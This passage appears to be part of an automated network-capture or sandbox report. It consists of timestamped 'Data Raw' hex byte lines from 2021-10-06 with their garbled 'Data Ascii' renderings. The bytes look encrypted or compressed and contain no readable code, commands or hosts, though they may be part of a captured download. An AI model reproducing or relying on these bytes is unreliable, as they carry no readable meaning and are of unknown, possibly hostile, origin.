84 1a 6d 13 25 dd 9c 42 88 cc f7 36 27 22 0f 8b 18 0f 4b 10 43 73 13 58 4c 29 44 86 2b cc 26 f1 a4 3b 5f 51 c3 88 28 04 1b 1c 58 a2 c6 64 8f fe ba 04 09 4e 05 38 60 4b 6b 3f a7
                                                          Data Ascii: onY~[=H^nox^?K6v!y<GL7&y,uOX[i}5A^VPb]P?Q8b8t5AG^!"v]mJL\9?)}p>GHD{icm%B6'"KCsXL)D+&;_Q(XdN8`Kk?
                                                          2021-10-06 16:03:54 UTC103INData Raw: d1 11 98 92 bc 5c 64 24 2f 64 87 28 74 1f b0 97 7b a0 2f 05 ea f6 2b fe 49 cf d3 3e b5 73 f5 b5 d1 fb 2f 5a 4e 39 b3 67 61 df ec 6f 3a 31 11 84 0a 90 c7 dd 0d 13 77 65 f9 92 27 72 00 06 03 e4 f8 13 40 d7 92 46 32 a9 a1 68 b7 58 66 0b 17 a2 a8 97 4f a3 1f c0 23 ac f7 e1 13 fa cc be 94 c7 f3 71 87 cd c1 13 fb 7e 3b e5 56 05 c0 d2 65 13 b3 d2 51 94 f1 53 86 c1 f9 5d 06 ec df 84 c1 f3 f3 9e f2 f4 6b 27 5f 88 53 52 ee d7 ed 17 8b b8 e6 55 19 38 5f 60 7c 83 c0 d1 56 b2 5d b6 2a 4d ae 68 cc 77 50 5c 6e 88 a4 92 31 ba 48 6b 24 6f 38 42 62 e1 2b d7 50 e5 39 c0 8c 8a 91 03 15 78 f3 d3 20 cc bb f0 6c eb fd 6d a3 38 40 d0 5c ec f6 55 47 b2 2f 09 f8 8e e6 f7 df 09 82 65 b5 15 10 b1 3b 5b bf 2c 85 f0 2e 74 22 25 ee 23 ac 5d 0e 90 cb 1a f1 33 e7 53 4a 0e e6 0f 25 80 15
                                                          Data Ascii: \d$/d(t{/+I>s/ZN9gao:1we'r@F2hXfO#q~;VeQS]k'_SRU8_`|V]*MhwP\n1Hk$o8Bb+P9x lm8@\UG/e;[,.t"%#]3SJ%
                                                          2021-10-06 16:03:54 UTC104INData Raw: fc 48 ef 41 59 73 f0 06 9b 9c 07 3d 67 17 48 5b e5 00 b9 6e 49 4f 86 79 d4 ff 4e 91 b4 a6 59 dc 82 2e 0f 20 01 7e 5b 15 e3 8b 4e 14 bc d8 9e ad b3 e6 12 b7 90 5f c6 b8 b6 40 51 2e 53 a4 c0 d5 ee f7 78 2b a9 0a 53 93 3a e6 1a fa 33 89 33 00 0b 2a 34 5f de 5d 65 4b bf 8c 38 d0 6b 91 bb 1c a8 55 bd bc 85 b2 a2 77 7a 2d 87 f2 43 a2 6f b9 13 b5 2d c9 25 4a 5c 5d a7 d8 2a bd aa e0 32 4c 53 5d 75 86 64 a3 a6 72 1d 57 08 48 0f 92 43 82 d7 fb 5e 36 23 1e 87 2f b5 b7 11 65 69 09 34 e1 46 90 8d 34 da 2a d3 b7 22 59 5f d1 60 d7 29 2c 1d 34 bf cf 64 9a d6 a5 a1 f7 4f 01 a3 49 4e 59 94 43 d2 c6 d2 3d a8 69 5a e7 cd 48 50 cf 22 c4 2c 29 32 f0 80 23 c2 58 77 88 73 e7 d4 88 6d 05 1f c0 c5 0c bf cd 05 f0 82 9f 2a fe ce 62 9a 50 47 a2 96 2c 86 a2 61 4b a2 ec 6b 9f e8 1b fa
                                                          Data Ascii: HAYs=gH[nIOyNY. ~[N_@Q.Sx+S:33*4_]eK8kUwz-Co-%J\]*2LS]udrWHC^6#/ei4F4*"Y_`),4dOINYC=iZHP",)2#Xwsm*bPG,aKk
                                                          2021-10-06 16:03:54 UTC105INData Raw: 0f 1d e1 9b 6c 68 ec 99 59 32 c7 be 69 a6 58 66 16 fa ab 84 8c 6f 2b 0b 3e 28 8c f8 f6 08 e1 c6 79 b8 54 0f 70 a1 d1 c6 77 e0 6c 33 e1 28 91 dd de 91 18 86 d0 50 ef fb 56 99 ce 12 32 6a d2 dc ff cf ed fe 89 f8 8f 76 2e 40 96 c2 d9 c0 df ef 6a 5f cf e8 4f 0a 34 89 59 ef 9e c9 25 41 80 3d 1c 22 52 ae a1 e8 ef 56 5c 75 81 ac 66 23 9e 4b 62 3f 77 c6 52 4a f3 3c 21 49 1f 18 73 d0 74 64 f6 17 7e e8 d7 31 d5 a0 f8 82 14 d0 58 b1 39 33 c1 51 3a da 68 6e 29 27 21 5a 9a f8 92 0b 28 83 6f ae 1b 1b a6 33 4a aa 3b 90 f0 2e 74 02 24 9d 05 26 5f 0a 80 4d 2d e2 3b e6 4f 4b 07 ea a1 b8 a5 0d e9 eb 33 8a 3f 58 6f 4b d3 dd d5 c1 e4 49 67 76 66 63 5a b9 f4 e7 99 84 dd 27 ef 84 ed 57 4f 7e 86 a1 a3 07 a6 6e 43 82 fc 59 42 1c 79 b0 59 7c d9 cb ef 95 49 9e 51 d2 fa 75 29 b0 98
                                                          Data Ascii: lhY2iXfo+>(yTpwl3(PV2jv.@j_O4Y%A="RV\uf#Kb?wRJ<!Istd~1X93Q:hn)'!Z(o3J;.t$&_M-;OK3?XoKIgvfcZ'WO~nCYByY|IQu)
                                                          2021-10-06 16:03:54 UTC107INData Raw: b9 cb ce 9b e6 68 23 b2 1c bc 96 01 81 c7 4b aa e8 85 4e f5 d5 ca 3d db 4f 6d 4f ac ff 2b 2f 6a b9 b8 08 bc cb be bc 8b 98 be 1f 7c 2c 96 fe 5e d3 81 b9 3f bd 38 88 34 80 13 07 a7 dc 3f 90 bb 93 3c 5c 5b 46 72 6e 0a 1f a9 7a 11 67 18 2d 78 b0 41 f3 c6 f5 4d 3a 4c 89 8d 30 9c 5f 7a 74 0d f5 c8 1a f7 48 a4 03 dc 35 fd 8c 12 59 4e d3 a8 29 3e 2a 18 09 ed db 64 8b de ba 85 09 5c 2d a1 62 fd 60 29 bf e5 38 f8 2e 94 6a 5a 9b d7 48 50 2e 31 f4 3f 3f 11 db 9b 23 cd 4f 89 98 49 ee e7 98 6d 05 1e c0 c5 0c bf c2 05 f0 82 91 2a fe ce 62 a6 59 6c 46 81 d3 af 11 61 60 aa ab ab 9d 93 01 fb 08 0e 7d dc 66 6d db e0 48 cf 90 0c 7f 4d db 05 53 41 d0 2e a1 f7 e2 17 ed c7 4e 20 ee b5 f3 da 08 a3 15 2d 4b 65 7f dd 78 56 7f 2d b8 ee 55 9d ea 2e 3b 5b 1a 8f 3f a1 ab df 69 00 35
                                                          Data Ascii: h#KN=OmO+/j|,^?84?<\[Frnzg-xAM:L0_ztH5YN)>*d\-b`)8.jZHP.1??#OIm*bYlFa`}fmHMSA.N -KexV-U.;[?i5
                                                          2021-10-06 16:03:54 UTC108INData Raw: 2a cf c9 d7 21 f6 f3 9c e6 02 60 26 5f 8d 28 cc f8 ff 44 7d 89 c9 df 45 19 3c 83 44 ef 95 e8 34 44 ac 34 08 a7 4a a4 77 c1 77 50 4d 7b 9a 9b 9c 34 96 4d d1 26 6f 2c 47 72 d6 9c 29 51 c3 18 4f d2 74 64 d0 08 46 d8 d0 34 f5 52 eb 7c 13 ea cc b3 3a 3b df 49 f8 e6 7b cc 29 2d 03 e6 b0 09 9c 76 0f 94 e2 ad 04 03 b4 2f 5e af 1b 28 0e 2f 52 21 91 95 2d a7 75 bd 8a 46 3b cb 5d 19 a1 bc 1f ed 77 4b 8d 02 ec f5 a0 5b 17 d3 6c 5f cd da fb 7d f0 5a 65 5e 2d 6b 45 bc 00 38 a5 b5 f0 13 e7 9b f3 8c 71 4f af 99 a9 7a b0 b1 43 80 c9 49 51 14 38 bd 51 63 c0 35 ee b9 50 9b 52 da 16 68 ff 98 50 14 12 9e 4e 56 2e 1c da 30 89 c9 98 78 b6 3e 76 e2 fa 47 95 a4 07 dd 0b 14 11 fc 36 15 ba 5a e2 e2 3e 03 df 1d 1e a3 62 50 a3 ea c8 d9 93 4f 1f f4 50 9e 30 96 11 15 65 40 4c 5d eb c8
                                                          Data Ascii: *!`&_(D}E<D4D4JwwPM{4M&o,Gr)QOtdF4R|:;I{)-v/^(/R!-uF;]wK[l_}Ze^-kE8qOzCIQ8Qc5PRhPNV.0x>vG6Z>bPOP0e@L]
                                                          2021-10-06 16:03:54 UTC109INData Raw: 32 9c b9 e8 32 1c 3f 42 7b 7a 65 8f ab 57 1b 41 0f 2c a6 92 43 b0 c8 f4 4d 32 23 0f 8f 30 96 49 10 4b 65 0b 37 a1 29 44 8c 1e dd 35 f7 ca 2b 59 4e cf 76 29 28 00 1e 23 ac c5 64 8b de 31 84 09 4e 35 a1 62 4b c2 28 bf 2d 35 f8 2e 98 6a 5a 9b cd 4a 50 2f 22 7d 3c 3f 39 41 9b 23 c5 1c 8b 89 5f f3 cc 83 6d 02 09 3e c4 3b 8d d3 0e 05 87 87 d4 13 e2 60 a0 4c e1 6a 99 2d af 2e 6a 38 06 80 48 95 fb 1d eb 0e 1e 7f 22 66 45 ca f7 c5 c2 92 13 64 76 6e 14 5d 5d e9 c7 07 e6 ea 2c 5c d6 41 3e 87 85 7f f5 0c 89 14 2d 6b 70 6f 02 6e ca 6e da af c6 e3 8b f9 20 25 f1 0b 99 af 8d a5 ca 7c e8 ae 0c 96 53 2a f7 50 a0 39 29 78 0b 64 fb 6d 95 b1 d9 50 c6 3a 2b ef df 3c af ea 3e 90 c9 31 41 d2 92 ae 89 28 fc 28 86 57 8d fb 14 2e a7 d1 d6 c2 7c 3d cd 31 b5 4a fe c1 a5 aa 0a 3c 4b
                                                          Data Ascii: 22?B{zeWA,CM2#0IKe7)D5+YNv)(#d1N5bK(-5.jZJP/"}<?9A#_m>;`Lj-.j8H"fEdvn]],\A>-kponn %|S*P9)xdmP:+<>1A((W.|=1J<K
                                                          2021-10-06 16:03:54 UTC111INData Raw: c9 3a f5 ac e7 6e fc 00 66 e9 b8 43 dd bf e5 6f 13 d7 19 a5 3c 54 ba 5d ec f8 27 2d 29 2d 08 e1 9c ff e6 e5 09 82 65 c5 1d 02 b5 31 66 97 22 8f 26 27 5d 09 21 fa ed af 5d 00 a2 f1 31 f1 39 ca 4c 52 1c d1 56 bc 89 04 85 23 2f 5c 1d bc 78 4b d9 c4 d8 cf f4 35 ae 74 77 61 42 9e ef e5 b5 96 a6 b7 e7 9b f3 ee 1f 45 87 ab a2 6b bc 00 25 86 e3 43 7c 8b a7 ad 40 65 ec 32 ff bf 3f cc 52 da ef b5 f8 92 7d 00 37 b6 69 56 2e 16 d3 35 a1 c2 86 48 b5 34 da db fa 47 75 7a 07 ca 09 e6 09 fc 30 1d b8 39 c5 8e bb 07 fb 32 1e a3 68 7d af e8 b3 6b 07 4f 0e c6 60 9e 31 87 07 1f 1e dd 4d 5d ef 0f 6d be ef bf 4d d5 df 3e 50 6d b1 3b e5 5f 19 04 0e 97 ef c3 07 e3 7d 27 8f 55 00 b3 8c 60 c0 b9 69 ee c9 2e b6 5f b5 67 d9 fc e1 a8 c4 c0 6d 02 75 b6 a5 4a da e6 e6 b8 62 17 f7 f9 dd
                                                          Data Ascii: :nfCo<T]'-)-e1f"&']!]19LRV#/\xK5twaBEk%C|@e2?R}7iV.5H4Guz092h}kO`1M]mM>Pm;_}'U`i._gmuJb
                                                          2021-10-06 16:03:54 UTC112INData Raw: ba 83 1f 66 3c a0 62 41 6d 2e 97 3c 3c f8 28 f7 73 5b 9b c7 71 e7 2e 22 c4 15 2d 3c db 9d 2e cc 67 9a 8c 5f e3 a3 9a 6c 02 03 12 c8 29 95 ce 0b f0 83 af f0 ff e2 6a bc 50 6a 2e 53 2f ae 37 7c 73 b2 96 27 6b e9 1b fc 20 18 56 a6 6e 6d 9b e2 48 c3 ba 3d 67 65 66 6a 2b 4b f8 c4 8d c2 e6 3f 59 d4 49 3d 80 9a ca 8b 0d 89 15 2f 7c 63 04 23 78 56 7b a5 73 ec 44 81 23 32 db f7 c1 98 e9 2c af db 73 ff 27 2d 91 42 2d ff fb 85 38 29 67 4c bb f9 6d 95 43 f5 89 d1 ea 4c ec cc 36 9f c1 26 86 b8 31 52 dd 73 d3 9c fe 7b 0b 97 5f 54 f0 c5 2e a4 d8 09 02 0b 8c a0 c5 be 5b ff f8 be 25 bd 30 d7 a1 9a 8f 6d 55 22 5e a3 8d 08 71 b3 66 c5 3e 2f ca a9 6e 8b 98 a7 49 78 26 1a a6 87 25 47 e8 b1 bb 48 b4 45 02 65 41 38 3b 76 b7 e8 a9 8f ca ff a3 cf 85 8f 4b 42 a9 b0 64 4d 36 fc 6b
                                                          Data Ascii: f<bAm.<<(s[q."-<.g_l)jPj.S/7|s'k VnmH=gefj+K?YI=/|c#xV{sD#2,s'-B-8)gLmCL6&1Rs{_T.[%0mU"^qf>/nIx&%GHEeA8;vKBdM6k
                                                          2021-10-06 16:03:54 UTC113INData Raw: f6 5c 1a 5f 43 1e e8 57 d6 5b 00 ea e9 32 67 04 d8 6d 5a d2 d1 cf 20 f1 76 63 67 71 73 2a 4f 0b e6 b3 8f c5 37 ec 9b e8 8a 78 58 79 a0 85 6a ab 69 40 8f f4 9f c0 7b 82 a0 51 65 df 2b fd b2 50 8a 59 c5 ef 97 fe b4 b2 12 11 10 e9 5f 36 ca 1a 5f 72 c9 83 4e ac 35 e1 e8 fa 56 74 bb 15 32 22 cb 05 f4 be a8 bb af 72 ea 26 d1 2d 03 28 bc 7b 6e a4 e8 a2 f5 8d 5b e5 dd 4c 98 1b 91 28 02 0d 6c 4d 4c e4 ff 7b 40 ff bb 57 d3 d6 20 92 4d 65 28 e1 7d 27 14 0e 9d fa d9 6a 7b 7d 36 8e 46 1c 59 a5 40 cc b1 e1 4e 57 2d a9 49 a7 7f df fc ec a5 12 cc 44 04 65 07 b0 50 dd f9 f2 81 ca 08 f8 0d f4 f2 d6 fb 29 4e 3f e5 7e f8 69 24 b1 55 00 21 83 89 f7 c5 d5 4a 45 8c fb 33 80 97 0e bd 7c 02 77 b6 ef 2c a4 61 47 51 17 e5 fa f3 55 84 8f f5 e3 dd 93 26 07 c5 13 59 58 1c fb 9c 43 fb
                                                          Data Ascii: \_CW[2gmZ vcgqs*O7xXyji@{Qe+PY_6_rN5Vt2"r&-({n[L(lML{@W Me(}'j{}6FY@NW-IDeP)N?~i$U!JE3|w,aGQU&YXC
                                                          2021-10-06 16:03:54 UTC114INData Raw: 8e 4b 37 5c 85 24 0e e4 c1 f6 79 a1 d5 f6 54 13 23 c8 5b ec 81 d1 d0 5f 8e cc 1e 06 44 9c 49 3b 9b ab 43 5c 9f b8 6c 21 9d 54 44 c9 6a 14 58 15 fe 3d 29 57 da 38 e7 ea 67 65 fc 1b 66 ff 93 de dc 93 e3 75 04 f5 7f 3e c7 c4 21 42 a9 e1 58 6f 38 26 16 fc 66 f9 b4 7b 18 87 70 9a 6b fa b4 3b 4c a4 3c 98 05 2f 49 02 38 99 d3 ac 71 03 b2 49 cc 0e cc f9 53 50 13 f9 4e b2 96 41 14 e2 01 54 1e c4 bb 46 c6 8a c0 d5 f0 4b 64 69 7c 95 44 9a 1e e1 da 6a d9 24 e1 8c 23 96 b1 c8 ac a1 a9 7b b6 70 4f 95 e8 49 40 1f 66 9c af 62 ec 38 ed 37 e7 92 4a 0c 3f 7a fb 87 9d 06 19 9e 4f 5d 31 02 3e 31 a5 d9 84 27 4f 3f f2 e5 eb 41 10 76 05 cc 29 f8 0a ef 3b 1f a9 2a da d2 c0 06 db 39 1d aa 7f ab 3e fb b7 e1 a0 5c 10 dc 71 95 28 62 36 3b 17 14 4d 5f ef e6 66 a7 ed 9c 46 c1 d4 27 6e
                                                          Data Ascii: K7\$yT#[_DI;C\l!TDjX=)W8gefu>!BXo8&f{pk;L</I8qISPNATFKdi|Dj$#{pOI@fb87J?zO]1>1'O?Av);*9>\q(b6;M_fF'n
                                                          2021-10-06 16:03:54 UTC115INData Raw: 7c 4f 8f ab 7a 08 71 0a 27 d9 93 43 88 3f f4 4d 2f 35 1c 8a 08 ff 48 10 49 65 1a 32 f8 d7 45 a0 23 de 4e b2 a5 2a 5d 4c a2 30 28 28 04 16 35 af ef 51 8a de b0 9b 1a 4b 2d b0 67 53 9f 28 93 23 3a ef f4 8f bc d7 b0 cd 48 51 23 3b d7 38 3f 28 de 82 dd c4 63 8c 9f 52 ff df 86 6d 13 0c 21 ce de bc e3 99 f0 85 87 d6 84 a7 61 b1 56 6e 3a df 2c ae 39 6b 5d ae a8 7d 9e e8 11 f8 0a 76 10 a7 64 41 da c8 42 c5 92 38 18 23 61 05 57 42 fe 18 a8 cf 15 3f 53 c7 4d 23 49 81 f6 d8 0e 9e 7a 38 79 61 79 69 3c 57 7f ce a9 ea 46 f0 ba 2b 03 e4 2a ad 3d da ff da 73 fa 22 2c 8e 51 51 be 81 b2 3d 01 56 22 70 f1 64 9d e2 ae 50 c6 34 89 f0 e7 8f b4 f9 37 8d d2 7e 51 db 18 0f 96 f7 60 07 ae 62 8d e8 19 3d bf c4 ac 92 12 9b cb 33 bd 20 ba d1 ac 20 c0 7d fe f6 9c 87 41 62 07 4f a6 8b
                                                          Data Ascii: |Ozq'C?M/5HIe2E#N*]L0((5QK-gS(#:HQ#;8?(cRm!aVn:,9k]}vdAB8#aWB?SM#Iz8yayi<WF+*=s",QQ=V"pdP47~Q`b=3 }AbO
                                                          2021-10-06 16:03:54 UTC116INData Raw: f6 4d 08 cc bf ef 76 18 d4 50 b4 3a 31 d2 41 ff ff 53 7e 24 32 00 0c 99 d4 a9 74 72 ca 6e aa 00 0b c1 29 4a bb 28 9d 06 3b 70 88 25 95 2b bb d0 0d 8a 46 30 e5 27 f2 76 e0 18 f9 55 91 d3 02 ea e9 42 81 15 d3 67 47 c6 c4 c0 d3 f0 4b 62 68 89 6a 69 bf 32 a4 4a 6f 27 3b ee 88 f4 81 76 48 98 ae 57 7b 96 65 40 bf f2 b6 ae eb 66 b1 42 6e c0 24 e3 a6 49 65 53 f6 f5 6b 84 dc a2 15 16 8b 1e d4 2f 1c c0 2f 93 db 8e 48 a2 33 ea 1d fb 6b 68 a6 7c 85 22 e7 11 72 87 05 6e 36 1f f4 e8 8a dc 32 1e a2 65 64 bc e5 b3 ef 9f 56 e5 dd 4c 80 32 e7 7e 16 1e 63 5b 54 9b 61 6d be ff 81 44 ab 96 39 44 41 fd 8e cd 60 30 15 04 8d f6 c3 79 61 70 38 95 a7 08 8b d1 78 15 38 6f f9 45 01 a2 5f b4 7e f7 f1 e4 be ea d4 e5 05 73 14 b5 5f c9 e3 f5 86 c7 b5 e6 f4 e2 d6 ee fb 2c 4d 3c 50 b9 6e
                                                          Data Ascii: MvP:1AS~$2trn)J(;p%+F0'vUBgGKbhji2Jo';vHW{e@fBn$IeSk//H3kh|"rn62edVL2~c[TamD9DA`0yap8x8oE_~s_,M<Pn
                                                          2021-10-06 16:03:54 UTC118INData Raw: 2c bf 3c 3c ef d0 99 46 59 83 de 4d 50 3e 27 d2 c3 3e 15 d8 8c 30 c0 4f 98 8c 45 1b cd af 6f 29 0b 15 7f 22 d2 13 0e f0 8f eb f7 ff e2 60 b1 52 6c 41 d9 76 8d 3d 63 4b a8 80 48 6f d7 42 d2 99 0a 57 ac d3 52 1a 6d 63 c5 92 12 6e 73 67 8b e4 5c 22 dd a1 fa cf 1d 51 ce 56 f2 8b fd 1d da 0c 83 19 39 72 69 5f 17 7b 56 7f e2 5a ec 44 81 d1 c9 01 e0 11 13 36 b6 6c d6 7a ef 30 15 5e 54 00 fd 93 82 3a 29 dc 23 70 fb 91 9f 99 fc 47 d5 35 67 56 df 3c b4 f9 26 8a b2 c5 51 f7 19 32 d9 e2 62 06 86 46 89 f5 ed 3e 82 d5 d6 fc 04 9e cf 37 b7 d7 d2 d0 ac 25 d2 ee fd f6 92 a9 75 6e 09 5c b2 8e 79 f7 b2 4a c7 95 29 16 b3 a7 91 81 b3 43 78 32 32 9a 97 00 69 e3 a2 bf 79 b1 51 0b fa f3 30 e8 9b a4 d7 ae be 62 fb 2d 78 a6 ae 45 44 20 aa 74 74 da e5 95 24 14 e6 f6 9f 87 c5 ac 08
                                                          Data Ascii: ,<<FYMP>'>0OEo)"`RlAv=cKHoBWRmcnsg\"QV9ri_{VZD6lz0^T:)#pG5gV<&Q2bF>7%un\yJ)Cx22iyQ0b-xED tt$
                                                          2021-10-06 16:03:54 UTC119INData Raw: 9d 16 c2 40 2d 5c 1d c2 6a 5f f1 21 d7 de f6 4d e2 71 77 6b 44 a5 15 f7 aa 86 f0 02 e2 9b ff 23 76 5a 93 b5 bd 52 19 6f 43 8c cb 74 53 14 73 89 e6 63 c0 3f d7 74 51 9b 52 d3 f1 41 3c 9b a3 13 05 13 59 56 2e 1d d3 10 98 e8 95 5e 3f 01 f2 e3 fb e5 6e 84 13 d8 37 cf b6 fc 30 15 ac 09 06 e0 3e 01 e0 bf 19 a3 68 7c bc c9 a2 df 84 59 97 e3 60 9e 31 3e 26 36 0a 73 59 75 4c e0 6d b4 ea bf 85 d3 df 3e 53 c8 74 39 e5 54 22 37 1f b5 f3 d9 f5 4f 7d 27 84 fb 18 85 b0 78 d1 91 cc f9 44 23 a2 77 77 77 df eb f0 33 eb cd 68 03 60 37 a5 6f d8 e4 7e af c1 17 f6 51 e4 fd d2 fe 38 65 95 f2 a8 63 12 f7 74 56 06 38 85 17 fb c5 c4 40 4d 66 ee 37 2b 94 07 26 47 19 6a a5 ee 3f b9 63 4c 63 2a e7 d6 f9 53 03 90 b5 51 dd 80 05 09 fd 16 44 d4 32 f0 83 4f a7 a5 e4 93 47 a6 e2 bf b4 c0
                                                          Data Ascii: @-\j_!MqwkD#vZRoCtSsc?tQRA<YV.^?n70>h|Y`1>&6sYuLm>St9T"7O}'xD#www3h`7o~Q8ectV8@Mf7+&Gj?cLc*SQD2OG
                                                          2021-10-06 16:03:54 UTC120INData Raw: 0d 77 23 0a 57 a7 77 5e ce c8 6f c0 92 15 4d 41 60 05 59 38 0b cf a5 f1 f7 2b 42 d3 21 db 92 92 f4 b5 ea 8b 15 34 68 44 47 1a 78 56 7f d8 9d c6 a3 89 f9 20 8f ca 1b 8f 24 b2 a6 ca 6f ea 1c 0c 83 53 2c eb 0d b5 39 29 62 37 64 ef 45 3c 99 ed 5b ee 18 5a fd d9 2a 9c 11 35 8f a3 2a 4c cf 34 31 9a fe 77 15 0b 50 8c e8 12 2b ba d4 f9 77 13 9b c5 19 96 5e f9 d6 ba 0c 55 38 ff fc b0 66 69 7d 06 4d bf 9f 4f 21 b7 66 c9 8a b3 c7 be b8 99 86 a2 57 41 94 2b 64 9c 04 45 e4 b1 bd 75 8a bc 09 eb fc 07 08 67 a5 f1 8d 00 73 ff a9 e3 89 97 46 5a 1b 28 77 65 d9 eb e6 22 38 ef 84 32 93 d1 8e a0 12 77 6b c7 26 bd 70 0a 1f 0f ef 8b ae 68 ff 9c 59 3e ac 28 6f a6 5c 78 0c fd b7 ac 3e 67 34 15 e8 01 a5 e8 f3 16 d6 3d ae 90 d5 21 3c ba de d7 40 72 7c 3b e7 2f 14 c5 d2 6f 18 be d5
                                                          Data Ascii: w#Ww^oMA`Y8+B!4hDGxV $oS,9)b7dE<[Z*5*L41wP+w^U8fi}MO!fWA+dEugsFZ(we"82wk&phY>(o\x>g4=!<@r|;/o
                                                          2021-10-06 16:03:54 UTC121INData Raw: 87 b4 eb 13 b2 53 47 2a 34 4f 31 89 c2 ae ac ac 26 e1 f4 fa 56 68 bb 1e 32 22 cb 01 ed 36 0e bc 09 a3 e2 3e 0d 98 c5 1f a3 6e 6e bd f7 a9 ed 85 4f 0a cb 7f bf ce 9d 1b 1c 6d 45 4f 5d e9 f3 7d a1 dc 84 51 d0 ce 2f 59 bb 72 15 e3 43 22 01 10 84 f2 ce 68 67 62 2a 7b 58 25 b0 b5 69 ed 92 6a f9 42 01 92 5f b4 7e f7 78 e7 be e6 de 60 1d 7d 07 a3 4c df e5 ea 6e c0 3b fe 80 4f de c6 e0 26 54 25 e5 a8 78 11 c0 bb ab 07 12 9e 8b f9 ed d2 43 59 74 d7 d9 97 98 14 3b 6f 19 7d bc 1a 2d 99 63 26 d8 e9 e4 dc f3 5e 9d 80 b5 40 cb 8c 36 e6 df 2c 59 2b fb f1 83 48 16 b2 d8 96 40 a5 ca 0d a3 df 54 3d d7 e7 75 41 3c 38 47 db c6 e0 e1 06 f2 b4 1e a7 fd ea ea 1d fa aa 51 d9 67 f5 df a4 bc ca 4e 6b 5c c1 55 27 2e 60 d2 4f 1f d3 5d af af 9e a5 af 73 72 3c 81 e5 7a 56 90 94 33 bf
                                                          Data Ascii: SG*4O1&Vh2"6>nnOmEO]}Q/YrC"hgb*{X%ijB_~x`}Ln;O&T%xCYt;o}-c&^@6,Y+H@T=uA<8GQgNk\U'.`O]sr<zV3
                                                          2021-10-06 16:03:54 UTC123INData Raw: f8 25 34 96 5f 02 d0 85 b2 3f 01 4d 21 70 fd 45 73 9b ed 5b a9 14 5d fd d9 2d a4 e8 3c a7 84 3e 50 dd 34 37 9c fe 77 2b 6a 55 8c e2 7c 19 ac c0 d7 c5 03 98 a0 1b bd 5b ff d6 bd 34 d2 22 fe f6 92 51 64 58 24 6b a3 8b 6d 1a a7 4e f7 9c 3e ca 60 b8 89 98 a1 95 7a 3d 3a 6e 87 3b 51 94 4f 44 9c b3 41 1c 3d e5 3a f0 70 b4 ed 2b 00 4c 14 5e 30 6b 80 70 4e 72 9b 74 65 df fd 6b 25 6b ef 85 26 8c c5 a6 03 4c 77 61 ef a8 bd 70 00 16 15 fe 96 ba 40 d7 98 c4 38 ba a5 05 a7 5c 79 12 eb a3 84 92 67 34 1f da 29 a0 e9 ee 30 f7 cc f5 91 df 0d 75 aa c2 d2 6a ff 7d 2d 8e d8 98 c2 d8 70 46 99 c9 57 83 8f 5f 98 ca 0d 56 2c ed 41 ff cf f8 db fc f1 8f 6d 2b 2c aa 3d d8 e6 c4 e3 6c 8d d7 df 7c 1d 3c 8f 5f 6a 86 c0 db 41 bf 34 0e 2c 5b a7 d5 d1 62 40 48 57 44 b2 6c 3a 87 4f 67 1f
                                                          Data Ascii: %4_?M!pEs[]-<>P47w+jU|[4"QdX$kmN>`z=:n;QODA=:p+L^0kpNrtek%k&Lwap@8\yg4)0uj}-pFW_V,Am+,=l|<_jA4,[b@HWDl:Og
                                                          2021-10-06 16:03:54 UTC124INData Raw: 3f ad 6d be fc bf 52 d0 df 32 6c 45 72 39 ef 28 4c 14 0e 93 e6 da 87 71 6b d9 84 53 0f 8b 89 6e c6 37 d8 84 c4 28 b6 5b b6 76 a4 6d e6 be e8 e5 30 00 73 1e c9 33 cf f2 f6 93 d7 15 8c 8c f4 de c2 e8 57 cd 37 f2 ac 41 eb dd b0 5f 02 2a 6d 9b ea 3b c5 4a 5e 5e d7 1d 8c 1a b0 51 ed 09 6a a1 e6 2e ce e8 59 4b ed cc 8e fd 44 84 ea 34 50 dc 97 22 0e dc 7b d3 59 0d f4 81 35 87 b5 c7 83 7b 5f c8 1c be c5 5a 3d d7 dd a5 51 22 5f 97 9d c4 e3 79 de 5e 32 1f ad 96 14 e9 66 78 bc 3e 0c 4d ad d7 cb 4a b6 cd 6c 4b aa 81 33 2c 11 3e b0 1e d7 59 c7 38 80 be b8 4c 9f 2f 96 f0 5e ad 1f 0f 42 3f 2f 99 34 35 7e 27 21 dd 35 b2 91 b0 30 5d 51 3f fe 79 65 8b 81 7a 1b 52 3f 25 a6 d2 42 88 c8 fd 4c 3e 32 19 9c 34 ae 7b 11 49 65 0b 26 e1 30 ba 8d 18 da 33 db cb 30 4a 4a d9 67 2d 37
                                                          Data Ascii: ?mR2lEr9(LqkSn7([vm0s3W7A_*m;J^^Qj.YKD4P"{Y5{_Z=Q"_y^2fx>MJlK3,>Y8L/^B?/45~'!50]Q?yezR?%BL>24{Ie&030JJg-7
                                                          2021-10-06 16:03:54 UTC125INData Raw: 27 65 d3 b5 84 4d 60 13 60 bc 84 4f 24 b1 66 c9 b6 64 be 27 b9 98 96 a8 d9 4c 1a 20 42 88 33 24 fe bc 93 4e a0 54 0d c1 94 51 78 64 a5 ff ba be e9 da 8e c3 b2 99 53 51 6b b0 78 4d f2 ff 6b 23 12 8d fb bf 86 c5 a2 1c 18 ed 44 c2 b6 9b 6f 0a 13 71 e1 9c 92 6d d5 98 5f 12 e4 db f1 a7 5c 7d 07 e2 39 a1 b0 6c 12 00 cb 36 cf f1 dd 2d fc cc a9 ba bd 73 e9 aa c2 c7 77 f9 e5 1e cc 35 bf dd de 70 6b b5 dd 7d b9 e2 57 9f e0 69 22 b3 c4 dd fb d0 ff 69 bf dd 80 41 39 52 ac b2 d8 ec d7 f8 77 a1 ee f5 54 1f 16 e7 36 7e 80 c0 df 5f a2 a8 3a 07 42 82 68 ce 44 cc 5c 7f 8c ac 66 18 bb 49 73 31 41 56 2d ff ff 3f 2d 4e c6 aa dd ff 7b 48 e3 05 4d 42 d7 20 dd a0 fd 54 38 fe 41 b2 10 55 a0 c4 ed f2 57 70 39 b7 2c df 97 de 87 66 29 36 6f aa 04 1c a6 13 67 b9 33 8d 24 45 26 90 26
                                                          Data Ascii: 'eM``O$fd'L B3$NTQxdSQkxMk#Doqm_\}9l6-sw5pk}Wi"iA9RwT6~_:BhD\fIs1AV-?-N{HMB T8AUWp9,f)6og3$E&&
